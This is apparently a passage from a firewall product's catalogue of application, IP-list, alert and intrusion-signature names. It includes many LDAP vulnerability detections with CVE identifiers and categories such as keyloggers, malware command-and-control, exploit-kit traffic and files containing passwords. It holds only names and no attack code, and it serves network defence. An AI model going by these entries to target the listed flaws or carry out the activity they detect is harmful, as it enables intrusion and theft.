IP_Length-Inconsistency
IP_Length-Total-Error
IP_Line_Messenger
IP_Linode
IP_LogMeIn_GoToMeeting
IP_Malicious-Sites
IP_Microsoft-Office-365-Common-Or-Office-Online
IP_Microsoft-Office-365-Exchange-Online
IP_Microsoft-Office-365-Sharepoint-Online-Or-OneDrive-For-Business
IP_Microsoft-Office-365-Skype-For-Business-Online-Or-Teams
IP_microsoft_azure
IP_microsoft_azure_active_directory
IP_microsoft_azure_asiaeast
IP_microsoft_azure_asiasoutheast
IP_microsoft_azure_australiaeast
IP_microsoft_azure_australiasoutheast
IP_microsoft_azure_brazilsouth
IP_microsoft_azure_canadacentral
IP_microsoft_azure_canadaeast
IP_microsoft_azure_europenorth
IP_microsoft_azure_europewest
IP_microsoft_azure_francec
IP_microsoft_azure_frances
IP_microsoft_azure_indiacentral
IP_microsoft_azure_indiasouth
IP_microsoft_azure_indiawest
IP_microsoft_azure_japaneast
IP_microsoft_azure_japanwest
IP_microsoft_azure_koreacentral
IP_microsoft_azure_koreasouth
IP_microsoft_azure_uksouth
IP_microsoft_azure_ukwest
IP_microsoft_azure_uscentral
IP_microsoft_azure_uscentraleuap
IP_microsoft_azure_useast
IP_microsoft_azure_useast2
IP_microsoft_azure_useast2euap
IP_microsoft_azure_usnorth
IP_microsoft_azure_ussouth
IP_microsoft_azure_uswest
IP_microsoft_azure_uswest2
IP_microsoft_azure_uswestcentral
IP_Microsoft_Intune
IP_Netflix
IP_NordVPN-Server-IP-Addresses
IP_Option-Too-Long
IP_Option-Too-Short
IP_Options-Detected
IP_Options-Length-Inconsistency
IP_Options-Malformed
IP_Options-Unused
IP_Private-Network
IP_Quad9
IP_salesforce_all
IP_salesforce_apnic
IP_salesforce_arin
IP_salesforce_community_cloud
IP_salesforce_email_apnic
IP_salesforce_email_arin
IP_salesforce_email_ripe
IP_salesforce_ripe
IP_SAP_Cloud_Platform
IP_Shoora_VPN
IP_Skype
IP_Spotify
IP_Telegram-Network
IP_Time-To-Live-Zero
IP_TOR-Exit-Node
IP_TOR-Launcher-fte-Bridge
IP_TOR-Launcher-obfs3-Bridge
IP_TOR-Launcher-obfs4-Bridge
IP_TOR-Launcher-scramblesuit-Bridge
IP_TOR-Relay-Node
IP_Webex_Server
IP_Webex_Teams
IP_Whatsapp
IP_Yealink_Meeting
IP_YourFreedom
IP_Zoho_Meeting
IP_Zoom
IP_Zscaler
iQIYI
Iqms
IQNavigator
IQTimecard
Iquotexpress
IRC
iRecruit
IRemUnknown2
Iridize
Iris
Ironmountain
ISAKMP
ISBA
ISBA-Fastcase
iScripts-MultiCart
iSCSI
iShares-529
Isl-Light
ISNetworld
ISNIC-Registry
ISO-13485-Quality-Management
Isohunt
IsoMetrix
isoTracker-Complaints-Management-Software
isoTracker-QMS-software
Ispirante
iSpot.tv
Issinc
IssueTrak
Issuu
Istock
ISystemActivator
itDuzzit
Iterable
Iteris
ITEXPERT
Itg
ITM-Platform
iTRAK
Itris
ITRP
iTunes
Itv-Player
IUID_Cannot_connect
IUID_Connection_Restored
IUID_Diagnostic_Error
IUID_Diagnostic_Info
iVantage-Health-Analytics
iVend-eCommerce
Ivideochat
Iwantim
Ixiacom
Ixl
Izenda-Embedded-BI
j2-Global
Jabber
Jacada
Jackrabbit-Care
JadaSite
JadeSoftware
JaggedPeak
jAlbum
Jamf-Now
Jango
Jaspersoft
Java SE 8
Java Update Scheduler
Jay-Is-Games
Jazz
JDASoftware
Jedox
Jeeves
Jenkins
Jenzabar
Jersey-Connect
Jet-Convert
JetBrains
JetDirect
Jewelers-Board-of-Trade
JFrog
Jiayuan.com
JiGiY
Jigoshop
Jigzone
Jimdo
Jiransoft
Jitbit-CRM
Jitsi-Meeting
Jitterbit
Jive
Jive-Hosted
jiveSYSTEMS
Job Search
Job-Manager
JobAdder
Jobaline
Jobber
JobDescriptions.com
JobNimbus
Jobpage
Jobscience
Jobscore-Jobseeker
JobsDB
JobServe
JobStreet-Philippines
Jobvite
Jogobu
John-Hancock
JoinMe
Joiqu
Jolicloud
JonDonym-Anonymous-Proxy
Joomag
Joomla
Joomlatools
Joost
Jostle
Jot-Form
Jott
Jottacloud
Journal-Technologies
Journey
Journyx
Joyent
Joyn
JPEG File
jQuery
JSON-RPC
JSTOR
Jugem
Jump-TV
JumpBox
Jumpchart
Jumplead-Lead-Generation
Jumpseller
Jumpshare
JungleDisk
Juniper-Networks
Juno-Webmail
Justachat
JustAddCommerce
JustAddContent
JustCloud
Justcoin
JustFoodERP
Justuno
JWPlayer
K3btg
Kaavo
Kadzoom
Kahoot!
Kaiser-Permanente-Healthy
Kaixin001
Kaizentek
Kajabi
KakaoTalk
Kali.net
Kalido
KalioCommerce
Kallidus-Talent
Kaltura
Kampyle
Kana
Kanban-Tool
Kanbanchi
Kanbanery
KanbanFlow
Kanbanize
KangoGift
Kanta
KAP-Virtual-Data-Room
Kapost
Kapta
Karaoke-Cloud
Karmacrm
Karpower
Kartmagic
Kaseya
Kaseya-IT-toolkit
KashFlow
Kashoo
Kaspersky
Kaspersky-AV
Kaspersky-Network-Agent
Kaspersky-Security-Network
Kaspersky_Security_Network
Kauppalehti
Kayako
Keas
Keek
Keen-IO
Keepandshare
KeeperSecurity
Keepit
KeepMeBooked
KeepVault
Kenna
Kenshoo
Kentico
Kerberos
Kerio
Kerio-VPN
Kerridgecs
Kewill
Keybase
KeyedIn-Projects
Keyloggers
Keymetrics
Keywordspy
Kickload
Kicksend
Kickserv
Kickstarter
Kielikone-MOT
Kies
Kii
Kik-Messenger
Kimbia
Kinaxis
Kindle-Cloud-Reader
Kindling-App
KineticD
Kineticglue
King
KingoRoot
Kinja
Kino
Kintone
Kiosk-Logix
KiSSFLOW
KISSmetrics
Kisters
Kiva
kkProxy
Klaviyo
Klipboard
Klipfolio-Dashboard
Klix-Media
Kloudless
KMI-EHS-Software
Knack
Knight-Online
Knovial-Cloud-Platform
Knowhow-Cloud
Knowify
Knowledge-Global
KnowledgeTree
Kochava
Koding
Kofax
Kohezion
Komoona
Kona-Company
Kongregate
KonnexMe
Kontera-Advertisers
Kontest
Kontrollis
Kony
Kool-IM
Kotisivukone
Kpasswd
KPI-Library
Kpi.com
KPN
Kproxy
Kronos
Krux
Krux-Digital
KTBSOnline.com
Ku6
Kubra
Kudos
Kugoo
KumoTeam
Kwkly
Kyozou
Kyriba
LabCollector
LAbite.com
LabLynx
LabTech
Ladbrokes
LahiTapiola
Lancope
LANDesk
Lands-End
LANSA
Lapio
Laserfiche
Last.fm
Lastline
LastPass
Launchlist-Pro
Launchpad
LaunchRock
Lavabit
Layar
Layered-Tech
LC_Advanced-Malware-Command And Control
LC_Advanced-Malware-Payloads
LC_Botnets
LC_Compromised-Websites
LC_Custom-Encrypted-Uploads
LC_Dynamic-DNS
LC_Elevated-Exposure
LC_Emerging-Exploits
LC_Files-Containing-Passwords
LC_HTTP-Not-Enough-Replies-After-Continue-Status-Code
LC_HTTP-Version-0.9-Transfer-Encoding-Chunked-Request-Header
LC_Keyloggers
LC_Malicious-Embedded-Iframe
LC_Malicious-Embedded-Link
LC_Malicious-Websites
LC_Mobile-Malware
LC_Newly-Registered-Websites
LC_Phishing And Other-Frauds
LC_Potentially-Exploited-Documents
LC_Potentially-Unwanted-Software
LC_Security
LC_Spyware
LC_Suspicious-Content
LC_Suspicious-Embedded-Link
LDAP
LDAP-UDP_CS-Wireshark-CLDAP-Dissector-DOS
LDAP-UDP_Samba-LDAP-Ad-Dc-Nested-Filter-Denial-Of-Service
LDAP-UDP_SS-Microsoft-Windows-CLDAP-Out-Of-Bounds-Read-CVE-2024-49113
LDAPS
LDAP_CommuniGate-Pro-LDAP-Server-Bind-Request-Buffer-Overflow
LDAP_CS-IBM-Domino-LDAP-Server-Modifyrequest-Stack-Buffer-Overflow
LDAP_CS-IBM-Lotus-Domino-LDAP-Bind-Request-Integer-Overflow
LDAP_CS-IBM-Lotus-Domino-LDAP-Heap-Buffer-Overflow
LDAP_CS-IBM-Lotus-Domino-LDAP-Server-Memory-Exception
LDAP_CS-IBM-Tivoli-Directory-Server-Ibmslapd.exe-Integer-Overflow
LDAP_CS-LSASS-Heap-Overflow-CVE-2010-0820
LDAP_CS-Microsoft-Active-Directory-Domain-Services-Elevation-Of-Privilege
LDAP_CS-Microsoft-Active-Directory-LDAP-Query-Handling-Denial-Of-Service
LDAP_CS-Microsoft-Windows-Active-Directory-Crafted-LDAP-Request-Buffer-Overflow
LDAP_CS-Microsoft-Windows-Active-Directory-Denial-Of-Service
LDAP_CS-Microsoft-Windows-Active-Directory-Integrated-DNS-Remote-Code-Execution
LDAP_CS-Microsoft-Windows-Active-Directory-Ldaps-Authentication-Bypass
LDAP_CS-Microsoft-Windows-ADIDNS-Information-Disclosure
LDAP_CS-Microsoft-Windows-Domain-User-Code-Execution
LDAP_CS-Microsoft-Windows-LDAP-Remote-Code-Execution-Vulnerability-CVE-2025-21376
LDAP_CS-Microsoft-Windows-LSASS-Recursive-Stack-Overflow
LDAP_CS-Microsoft_Windows_Memory_Corruption_Vulnerability_CVE-2020-0664
LDAP_CS-MS09-066
LDAP_CS-Network-Associates-PGP-Keyserver-Buffer-Overflow
LDAP_CS-Novell-eDirectory-LDAP-Null-Search-Parameter-Buffer-Overflow
LDAP_CS-Novell-eDirectory-LDAP-Null-Search-Parameter-Buffer-Overflow-2
LDAP_CS-Novell-eDirectory-Unchecked-Length-Denial-Of-Service
LDAP_CS-OpenLDAP-Back-SQL-LDAP-Search-SQL-Injection-Vulnerability
LDAP_CS-OpenLDAP-BER_get_next-Denial-Of-Service
LDAP_CS-OpenLDAP-ldapsearch-Pagesize-Double-Free-DoS
LDAP_CS-OpenLDAP-Modrdn-Rdn-Null-String-Denial-Of-Service
LDAP_CS-OpenLDAP-Modrdn-Rdn-UTF-8-String-Code-Execution
LDAP_CS-OpenLDAP-Modrdn-Request-Null-Pointer-Dereference
LDAP_CS-OpenLDAP-Slapd-Cancelrequest-Handling-Infinite-Loop-Denial-Of-Service
LDAP_CS-OpenLDAP-Slapd-Deref-Overlay-Null-Pointer-Dereference
LDAP_CS-OpenLDAP-Slapd-SASL-Proxy-Authorization-Validation-Assertion-Failure
LDAP_CS-OpenLDAP-Slapd-SASL-Slap_Parse_User-Assertion-Failure
LDAP_CS-OpenLDAP-Slapd-Search-Parsing-Checktime-Assertion-Failure
LDAP_CS-OpenLDAP-Slapd-Search-Parsing-Issuerandthisupdatecheck-Integer-Underflow
LDAP_CS-OpenLDAP-Slapd-serialNumberAndIssuerCheck-Integer-Underflow
LDAP_CS-Red-Hat-389-Directory-Server-Do_Search-Denial-Of-Service
LDAP_CS-Red-Hat-389-Directory-Server-Do_Search-Denial-Of-Service-2
LDAP_CS-Red-Hat-389-Directory-Server-NS-Slapd-ldapsearch-Buffer-Overflow
LDAP_CS-Red-Hat-389-Directory-Server-Server-Side-Sort-Denial-Of-Service
LDAP_CS-Red-Hat-389-Directory-Server-Vslapd_Log_Emergency_Error-Denial-Of-Service
LDAP_CS-Samba-LDAP-Ad-Dc-Nested-Filter-Denial-Of-Service
LDAP_CS-Samba-LDAP-Ad-Dc-Paged-Search-DoS
LDAP_CS-Samba-LDAP-Ad-Dc-Privilege-Escalation
LDAP_CS-Samba-LDAP-Server-Libldb-Infinite-Loop-Denial-Of-Service
LDAP_CS-Samba-Ndr-Parsing-Ndr_Pull_Dnsp_Name-Integer-Overflow
LDAP_CS-Suspicious-Packet
LDAP_CS-VMware-Vcenter-Server-Directory-Service-Authentication-Bypass
LDAP_CS-VMware-Vcenter-Server-Directory-Service-Authentication-Bypass-2
LDAP_CS-Windows-Active-Directory-Buffer-Overflow
LDAP_CS-Windows-Active-Directory-Parsing-Memory-Corruption
LDAP_IBM-Lotus-Domino-LDAP-Server-Invalid-DN-Message-Buffer-Overflow
LDAP_IBM-Tivoli-Directory-Server-LDAP-Buffer-Overflow
LDAP_Ipswitch-IMail-LDAP-Daemon-DoS
LDAP_Ipswitch-IMail-LDAP-Daemon-Large-Tag-BOF
LDAP_Ipswitch-IMail-LDAP-Daemon-Large-Tag-BOF-2
LDAP_Ipswitch-IMail-LDAP-Daemon-Large-Tag-BOF-3
LDAP_Ipswitch-IMail-LDAP-Daemon-Probe
LDAP_Microsoft-Active-Directory-LDAP-Search-Request-Buffer-Overflow
LDAP_Novell-eDirectory-evtFilteredMonitorEventsRequest-Function-Heap-Overflow
LDAP_Novell-eDirectory-evtFilteredMonitorEventsRequest-Invalid-Free
LDAP_OpenLDAP-ber-get-next-BER-Decoding-Denial-Of-Service
LDAP_OpenLDAP-LDAP-Server-BIND-Request-Denial-Of-Service
LDAP_Oracle-Internet-Directory-Pre-Authentication-LDAP-Denial-Of-Service
LDAP_SS-JNDI-Exploit-Kit-Traffic
LDAP_SS-Microsoft-Windows-LDAP-Searchresultdone-Integer-Overflow-CVE-2024-49112
LDAP_SS-Php-LDAP-Denial-Of-Service
LDAP_SS-Serialized-Java-Content
LDAP_SS-Shared-Variables-For-Server-Stream-Context
LDAP_SS-Suspicious-Packet
LDAP_Sun-Directory-Server-LDAP-DOS
Le-Monde
Lead-Zeppelin
Lead411
LeadConduit
Leaddesk
LeaderNation-360
LeadExec
LeadLander
Leadmaster
LeadNXT
LeadPages
LEADSExplorer
leadsNyou
LeadWatchLive
Leafcutter
Leagueoflegends
Lean-Canvas
LeanKit
LeanLogistics
LeapFILE
Learndot
LearningZen
LearnSmart-LMS
LearnUpon
Leave-Planner
Leavetrack
Lefora
Leftronic
Legal-Intelligence
LegalDiscovery
Legalesign
Legalzoom.com
Leiki
LemonStand-eCommerce
Lemontech-Selfbooking
LendingClub
Lengow
Lenovo
Less-Accounting
Less-Annoying-CRM
Lessons-Learned-Database
Letv
Level-3
LeveragePoint-for-Value-Management
LexisNexis
LexisNexis---Total-Research
LG-Cloud
LG-TV-Service-Delivery-Platform
Liaison-Technologies
Liberated-Syndication
Libero-Video
LibraryThing
Librato-Metrics
LibreOffice
License expires soon
Liferay
Lifesize
Liftshare
Lightcms
Lighthouse
Lighthouse-App
Lightspeed-POS
Limelight
Line
Line-2
Lineage
Linedata
Lingerie and Swimsuit
Lingo
Lingotek
Lingtu
LinkConnector
LinkedIn
LinkedIn Connections
LinkedIn File Download
LinkedIn File Upload
LinkedIn Jobs
LinkedIn Mail
LinkedIn Updates
LinkedIn-CDN
LinkedIn-Learning
Linkgard
LinkShare
LinkTrust
Lino
Linode
Linode-Infrastructure
Lintasarta
Lionbridge
Liquid-Motors-Portal
Liquid-Web
LiquidFiles
Liquidplanner
LiquidSpace
Lister-Technologies
ListHub
Listing-Lab
Listography
Liteaccounting
LiteManager
LitExtension-Shopping-Cart-Migration-Service
Litmos-Lms
Litmus
Little-Fighter
Little-Green-Light
Live-For-Speed
Live-Healthy-Iowa
Live-Meeting
Live-Online-TV
Live-TV-Center
Live2Support
Live365
LiveAgent
LiveBinders
LiveCart
Livechat
Livedoor-Blog
Livedoor-Webmail
Livedrive
Livefyre
LiveGO
LiveHelpNow
LiveHive
LiveJournal
LiveLeak
Livelinks
LiveNetLife
LiveOffice
LiveOffice-Discovery-Archive
LiveOps
LivePerson
LivePlan
LiveRail
Liveramp
LiveStation
Livestream
Livesupporti
Livetecs
LiveUAMap
LiveWatch
Livingsocial
LKQD
Llamasoft
LLMNR
Load-Impact
LoadSpring
Loadster
LocalBitcoins
Localeze
Localize
Localtunnel
Localytics
Lockerdome
LockPath
Lodgify
Log Server restarted on system resource failure.
Log Server: critical error
Log Server: disk full
Log Server: disk is becoming full
Log Server: log file corrupted
Log Server: Log Forward Server Buffer Overflow
LogEntries
Loggly
LogiAnalytics
LogicalDOC
Logicalware
LogicBox-CRM
LogicManager
Logicmonitor
Logikcull
LoginRadius
Logisticsolutions
Logitech Gaming Framework
Logitech GHUB
Logitech Updater
LogMeIn
LogMeIn-Rescue
LogoMyWay
Logrhythm
Log_Compress-SIDs
Lokad-CRM
Lokalisten
LongJump-AgileApps-Live
Lookout
LookSmart
LookSmart-PublisherCenter
Loom
Loop11
LoopFuse
Loopia-AB
Loopline-Systems
LoopNet
Loopster
LoopUP
Loring-Ward
Lose-It
Lotus-Greenhouse
Lotus-Notes-Webmail
Lotuslive
Louisville-Slugger-B2B-Store
Love-money
Lovelog
LOYAL3
LoyaltyLion
LPD
Lsass.exe
LSE-Careers
LSI
Lucidchart
Lucidpress
LuckyOrange
Lulu
Lumapps
Lumenate
Lumension
Lumesse-TalentLink
LumoFlow-for-Sales
Lumosity
Lunacloud
LunaPic
Lunarpages
Luxor-CRM
Lynda
Lynkos-CRM
Lynuxworks
M-Files
M3V-Software
Mac-Forums
Machi-Bbs
MacKeeper
MacPorts
Macys
Mad-Mimi
Madison-Logic
Madthumbs
Maestro.fm
MageCloud
Magento
Magic-Software-Enterprises
Magicbackup
Magisto
Magix
Magnetic-North
Mahalo
Mahara
Mail-Online
Mail-Riseup
Mail.com
mail.ru
Mailbox-Forwarding
Mailbox.org
Mailchimp
Mailer-Lite
Mailgun
Mailjet
Mailprotector
Main-Sequence-Technologies
Maindec
Maintenance contract expires soon
Maintenix
Majesco
MakingFun-DominionOnline
Malicious Embedded iFrame
Malicious Embedded Link
Malicious Websites
Mals-Ecommerce
Malwarebytes-Antimalware-Update
ManageBac
ManagedMethods
ManagedVoice-Connect
ManageEngine
Management Server database replication approaching system failure.
Management Server database replication issue.
Management Server restarted on system resource failure.
Management Server: Certificate Authority renewal started
Management Server: Certificate CA check for engine
Management Server: Certificate CA check for Log Server
Management Server: Certificate CA check for Management Server
Management Server: Certificate CA check for Web Portal Server
Management Server: Certificate check for engine
Management Server: Certificate check for Log Server
Management Server: Certificate check for Management Server
Management Server: Certificate check for Web Portal Server
Management Server: Certificate generated after last known
Management Server: Certificate not found
Management Server: Certificate not the last generated
Management Server: db connection full
Management Server: db sequence almost full
Management Server: disk full
Management Server: Engine Upgrade(s) available
Management Server: Login failed
Management Server: SMC API DoS
Management Server: Stonesoft Management Center Upgrade available
Management Server: Update available
Management Server: Update package activated
Management Server: Update package activation failed
Management Server: Update server not available
Management-Innovation-eXchange
Managerzone
Mandrill
Mango
Mango-map
Mango-Signs
Mangoapps
Manh
Manoto
Manta
Manulife
Map-Business-Online
Mapbox
Mapistry
Maplestory
MapMyFITNESS
MapMyHIKE
MapMyRIDE
MapMyRUN
MapMyTRI
MapMyWALK
Mapply
Mapquest
MarcomCentral
MariaDB
Marijuana
Marin-Software
MARKDOWN-GURU
Market-Dialer
Marketing-Optimizer
Marketlive
Marketo
Marketsight
Markettools
MarketWatch
Marketwired
Markit
Marklogic
Markmonitor
Maropost
Marriott-Hotels
Mashape
Mashery
Masskom
Master-Control
MasteringPhysics
Masternaut
materialise
Materna
MathXL-for-School
Mavenlink
Max.MD
Max:presence
MaxCDN
MaxDB
MaxEmail
MaxHire
Maximizer-CRM
Maximus
Maxis-cloud
MaxMind
Maxnet-TV
Maxpanda-CMMS
Maxxton
MaxxTraxx-Pro
MaxxVault
Maytech
McAfee
McAfee Endpoint Security
McAfee Security Scan Plus
McAfee Update Agent
McAfee VirusScan Enterprise
McAfee-ePO-Agent
McAfee-GTI-Service
McAfee-Saas
McAfee-SiteAdvisor
McAfee-SmartFilter
McAfee-Update-Service
McAfee_CS-McAfee-e-Business-Server-Authentication-Buffer-Overflow
McAfee_CS-McAfee-e-Business-Server-Authentication-Bypass
McKesson
MDL-autoMation
mDNS
Me2day
Measuredprogress
Medallia
Medatixx
MedBit
Medecision
Media File Download
Media-Hint
Media-Innovation-Group
Media.Net
Mediacom
MediaFire
Mediafly
MediaFunnel
Mediagrif
MediaLoot
Mediaocean
Mediaspectrum
MediaTemple
MediaValet
MediaWiki
MediaWiki-Editing
Medidata
Meditract
Medium
MedReps
Medrisk
Meetin.gs
MEETin.org
Meeting-Maker
MeetingKing
MeetMe
Meetup.com
Meevee
Mega
Megabox
MegaChat
Megacloud
Megafile-Upload
Megapath
Megaproxy
Megashare
Megashares
MegaSSH
Megaupload
Megaupload-Download
Megaupload-Upload
Megaventory-Sales-Management
MegaVideo
Meisterplan
Mekusharim
Melbourne-IT
Meldium
Melon
Meltwater
Member-Evolution
MemberClicks
Memberize
MemberMouse
Memcached
Memeo
Memopal
MemStash
Mendeley
Mendix
Mennonite-Mutual-Aid
MenschUndMaschine
Mentimeter
Mention
MEO-Cloud
Meraki
Merchant-Partners
MerchantOS
Mercury
Merrill-Edge
Merrill-Lynch
Message Boards and Forums
Messengerfx
Meta AI
Meta4
Metacafe
MetaLocator
Metaname
MetaPack
Metatrader
Method
Methodologee
Metric-Stream
Metricly
MetricPulse
Metrilo
Metro-International
MetroFax
MetrologicGroup
Metropix
MeYouHealth
MFG.com
MGCP_message_out_of_flow
MGCP_unknown_command_message
Mgoon
Mhelpdesk-Field-Service-Software
Mibbit
Michael-Page
MicroFocus
Microgen
Microsoft
Microsoft .NET Framework
Microsoft Copilot
Microsoft Edge
Microsoft Lync 2010
Microsoft Lync 2013
Microsoft Malware Protection
Microsoft Office 2007
Microsoft Office 2010
Microsoft Office 2013
Microsoft Office 2016
Microsoft Office Help Viewer
Microsoft Office InfoPath
Microsoft Office Subscription Licensing
Microsoft Office Undefined Version
Microsoft OneDrive
Microsoft OneNote
Microsoft Outlook
Microsoft Photos
Microsoft Solitaire
Microsoft SQL Management Studio
Microsoft Teams
Microsoft Windows Malicious Software Removal Tool
Microsoft Windows Notification UI
Microsoft Windows Sedsvc
Microsoft-Active-Directory
Microsoft-Active-Protection-Service
Microsoft-Advertising
Microsoft-Ajax-CDN
Microsoft-Analytics
Microsoft-Azure
Microsoft-Azure-Application-Proxy
Microsoft-Azure-Background-Services
Microsoft-Azure-Blob
Microsoft-Azure-CDN
Microsoft-Azure-Marketplace
Microsoft-Azure-Service-Bus
Microsoft-Azure-Tables
Microsoft-Certificate-Revocation-List-Service
Microsoft-Certificate-Services-Remote-Administration-Protocol
Microsoft-Clarity
Microsoft-ClusAPI-Protocol
Microsoft-Defender-For-Endpoint
Microsoft-Delve
Microsoft-Developer-Network
Microsoft-DHCP-Server-Management-Protocol
Microsoft-Disk-Management-Remote-Protocol
Microsoft-Distributed-File-System-Management-Protocol
Microsoft-Distributed-File-System-Replication-Helper-Protocol
Microsoft-Distributed-File-System-Replication-Protocol
Microsoft-DLT-Central-Manager-Protocol
Microsoft-DLT-Workstation-Protocol
Microsoft-DNS-Server-Management-Protocol
Microsoft-Dynamics-CRM
Microsoft-Encrypting-File-System-Remote-Protocol
Microsoft-EventLog-Remoting-Protocol
Microsoft-Exchange
Microsoft-Exchange-ActiveSync
Microsoft-File-Server-Remote-VSS-Protocol
Microsoft-File-Server-Resource-Manager-Protocol
Microsoft-Firewall-And-Advanced-Security-Protocol
Microsoft-Forms
Microsoft-IIS
Microsoft-Internet-Explorer-Gallery
Microsoft-Intune
Microsoft-Kaizala
Microsoft-Key-Management-Service-Protocol
Microsoft-Live-Remote-Event-Capture-Protocol
Microsoft-Local-Security-Authority-Remote-Protocol
Microsoft-Login
Microsoft-Mac-Update
Microsoft-Media-Server
Microsoft-Messenger-Service-Remote-Protocol
Microsoft-MSMQ-Directory-Service-Protocol
Microsoft-MSMQ-Queue-Manager-Client-Protocol
Microsoft-MSMQ-Queue-Manager-Management-Protocol
Microsoft-MSMQ-Queue-Manager-Remote-Read-Protocol
Microsoft-MSMQ-Queue-Manager-To-Queue-Manager-Protocol
Microsoft-MSN-Messenger
Microsoft-MyAnalytics
Microsoft-NCSI
Microsoft-Netlogon-Remote-Protocol
Microsoft-Office-365
Microsoft-Office-Sway
Microsoft-OneDrive
Microsoft-OneNote
Microsoft-Online-Certificate-Status-Service
Microsoft-Power-Automate
Microsoft-PowerApps
Microsoft-Print-System-Asynchronous-Notification-Protocol
Microsoft-Print-System-Asynchronous-Remote-Protocol
Microsoft-Print-System-Remote-Protocol
Microsoft-Project
Microsoft-Remote-Authorization-API-Protocol
Microsoft-Remote-Shutdown-Protocol
Microsoft-Removable-Storage-Manager-Remote-Protocol
Microsoft-Routing-And-Remote-Access-Server-Management-Protocol
Microsoft-SAM-Remote-Protocol
Microsoft-Server-Service-Remote-Protocol
Microsoft-Service-Control-Manager-Remote-Protocol
Microsoft-Service-Witness-Protocol
Microsoft-Shadow-Copy-Management-Protocol
Microsoft-Sharepoint
Microsoft-SharePoint-Online
Microsoft-Silverlight
Microsoft-SmartScreen
Microsoft-SQL-Server
Microsoft-SQL-Server-UDP
Microsoft-Store
Microsoft-Studios
Microsoft-Task-Scheduler-Remoting-Protocol
Microsoft-Teams
Microsoft-Technet
Microsoft-Telemetry
Microsoft-Telephony-Remote-Protocol
Microsoft-Telnet-Server-Remote-Administration-Protocol
Microsoft-To-Do
Microsoft-Translator
Microsoft-Virtual-Disk-Service-Protocol
Microsoft-Visual-Studio
Microsoft-W32Time-Remote-Protocol
Microsoft-Whiteboard
Microsoft-Windows-Activation
Microsoft-Windows-Client-Certificate-Enrollment-Protocol
Microsoft-Windows-Deployment-Services-Control-Protocol
Microsoft-Windows-Download
Microsoft-Windows-Management-Instrumentation-Remote-Protocol
Microsoft-Windows-Messenger-Service
Microsoft-Windows-Phone
Microsoft-Windows-Push-Notification-Service
Microsoft-Windows-Remote-Desktop
Microsoft-Windows-Remote-Registry-Protocol
Microsoft-Windows-System-Resource-Manager-Protocol
Microsoft-Windows-Update
Microsoft-Windows-Weather
Microsoft-Workstation-Service-Remote-Protocol
Microsoft-Xbox
Microsoft-Xbox-Downloads
Microsoft-Xbox-Live
Microstrategy
Midlandhr
Mighty-Commerce
MightyCall
Mightytext
MightyUpload
Mijura
Mikogo
Milestone-Planner
Milestonesys
Militancy and Extremist
Military
MilitaryHire
Mimecast
MiMedia
Mimeo
Mind42
MindBody
Mindenkilapja
Mindflash
Mindjet
Mindlogicx
MindMeister
Mindomo
Mindsalt
Mindseyesolutions
MindTickle
MindTools
MindTouch
Minecraft
Minecraft
Mineful
MineralTree
Miniclip
Mininova
miniOrange
Mint
Mint.com
Minubo
Minus
Minute7
MinuteDock
MIR3
Mirashare
mIRC
Miro
MIRS
Mirus
Miscellaneous
MissLee
Misys
mite
MITS-Distributor-Analytics
Mixcloud
Mixi
MixMobi
Mixpanel
Mixxchannels
Mlb.tv
MLC Certificate expires soon
MLC Certificate has expired
MLC_Connection_switchover
MLC_Connection_to_mlc_established
MLC_Connection_to_mlc_lost
Moat
Mobile Malware
Mobile-Field-Report
Mobile-Forms
Mobile-Legends
Mobile-Time-Sheets-App
MobileIron
Mobility-Portal
MobilityCentral
Mobiscope
Mobiso
MockFlow
Mockingbird
Mockupbuilder
Modbus_Diagnostics-Error-Response
Modbus_Diagnostics-Request
Modbus_Diagnostics-Response
Modbus_Encapsulated-Interface-Transport-Error-Response
Modbus_Encapsulated-Interface-Transport-Request
Modbus_Encapsulated-Interface-Transport-Response
Modbus_Error-Response-Reserved-Function-Code
Modbus_Error-Response-Unassigned-Public-Function-Code
Modbus_Error-Response-User-Defined-Function-Code
Modbus_Error-Response-Zero-Function-Code
Modbus_Get-Comm-Event-Counter-Error-Response
Modbus_Get-Comm-Event-Counter-Request
Modbus_Get-Comm-Event-Counter-Response
Modbus_Get-Comm-Event-Log-Error-Response
Modbus_Get-Comm-Event-Log-Request
Modbus_Get-Comm-Event-Log-Response
Modbus_Mask-Write-Register-Error-Response
Modbus_Mask-Write-Register-Request
Modbus_Mask-Write-Register-Response
Modbus_Read-Coils-Error-Response
Modbus_Read-Coils-Quantity-Of-Coils-Zero
Modbus_Read-Coils-Request
Modbus_Read-Coils-Response
Modbus_Read-Device-Identification-Error-Response
Modbus_Read-Device-Identification-Request
Modbus_Read-Device-Identification-Response
Modbus_Read-Discrete-Inputs-Error-Response
Modbus_Read-Discrete-Inputs-Request
Modbus_Read-Discrete-Inputs-Response
Modbus_Read-Exception-Status-Error-Response
Modbus_Read-Exception-Status-Request
Modbus_Read-Exception-Status-Response
Modbus_Read-FIFO-Queue-Error-Response
Modbus_Read-FIFO-Queue-Request
Modbus_Read-FIFO-Queue-Response
Modbus_Read-File-Record-Error-Response
Modbus_Read-File-Record-Request
Modbus_Read-File-Record-Response
Modbus_Read-Holding-Registers-Error-Response
Modbus_Read-Holding-Registers-Request
Modbus_Read-Holding-Registers-Response
Modbus_Read-Input-Registers-Error-Response
Modbus_Read-Input-Registers-Request
Modbus_Read-Input-Registers-Response
Modbus_Read/Write-Multiple-Registers-Error-Response
Modbus_Read/Write-Multiple-Registers-Request
Modbus_Read/Write-Multiple-Registers-Response
Modbus_Report-Slave-Id-Error-Response
Modbus_Report-Slave-Id-Request
Modbus_Report-Slave-Id-Response
Modbus_Request-Clear-Counters-And-Diagnostics-Register
Modbus_Request-Force-Listen-Only-Mode
Modbus_Request-Reserved-Function-Code
Modbus_Request-Restart-Communications-Option
Modbus_Request-Unassigned-Public-Function-Code
Modbus_Request-User-Defined-Function-Code
Modbus_Request-Zero-Function-Code
Modbus_Response-Reserved-Function-Code
Modbus_Response-Unassigned-Public-Function-Code
Modbus_Response-User-Defined-Function-Code
Modbus_Response-Zero-Function-Code
Modbus_TCP-Conflicting-Transaction
Modbus_TCP-Excess-Transactions
Modbus_TCP-Foreign-Protocol
Modbus_TCP-Length-Violation
Modbus_TCP-Mismatching-Response
Modbus_TCP-Missing-Request
Modbus_Write-File-Record-Error-Response
Modbus_Write-File-Record-Request
Modbus_Write-File-Record-Response
Modbus_Write-Multiple-Coils-Error-Response
Modbus_Write-Multiple-Coils-Request
Modbus_Write-Multiple-Coils-Response
Modbus_Write-Multiple-Registers-Error-Response
Modbus_Write-Multiple-Registers-Request
Modbus_Write-Multiple-Registers-Response
Modbus_Write-Single-Coil-Error-Response
Modbus_Write-Single-Coil-Request
Modbus_Write-Single-Coil-Response
